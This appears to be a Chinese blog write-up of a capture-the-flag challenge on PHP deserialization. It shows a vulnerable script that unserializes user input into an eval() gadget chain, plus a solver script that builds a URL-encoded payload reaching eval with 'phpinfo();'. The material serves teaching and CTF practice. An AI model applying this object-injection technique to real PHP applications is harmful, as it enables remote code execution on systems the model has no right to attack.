当前位置:网站首页>PHP序列化:eval
PHP序列化:eval
2022-07-31 12:40:00 【小龙在山东】
题目
<?php
highlight_file(__FILE__);
class lemon{
protected $ClassObj;
function __construct(){
$this->ClassObj = new normal();
}
function __destruct(){
$this->ClassObj->action();
}
}
class normal{
function action(){
echo "hello";
}
}
class evil{
private $data;
function action(){
eval($this->data);
}
}
unserialize($_GET['d']);
?>
解题思路:通过传入d参数,参数是序列化后的字符串,用来调用魔术方法__destruct,然后调用evil的action,进而可以执行eval。
wp
生成序列化字符串:
<?php
class lemon{
protected $ClassObj;
function __construct(){
$this->ClassObj = new evil();
}
}
class evil{
private $data = "phpinfo();";
}
$test = new lemon();
echo urlencode(serialize($test));
边栏推荐
猜你喜欢
随机推荐
Structural controllability of switched linear systems with symmetry constraints
CameraToolUnity中两种摄像机的两种观察控制方式
dosbox基础使用[通俗易懂]
初识QEMU
三相PWM整流器预测直接功率控制
最长算术(暑假每日一题 11)
PAT exam summary (exam experience)
ERROR 2003 (HY000) Can‘t connect to MySQL server on ‘localhost3306‘ (10061)
NameNode (NN) 和SecondaryNameNode (2NN)工作机制
最近两个月谷歌 ad 掉的厉害
Qt鼠标穿透
基本语法(二)
CentOS7 - yum install mysql
基本语法(一)
查看Mysql数据库版本
Double non-one into bytes!!Pure dry goods sharing
chroot命令
Basic use of dosbox [easy to understand]
攻防演练丨赛宁红方管控平台走进广东三地 助力数字政府网络安全建设
The function of SQL GROUP BY dependence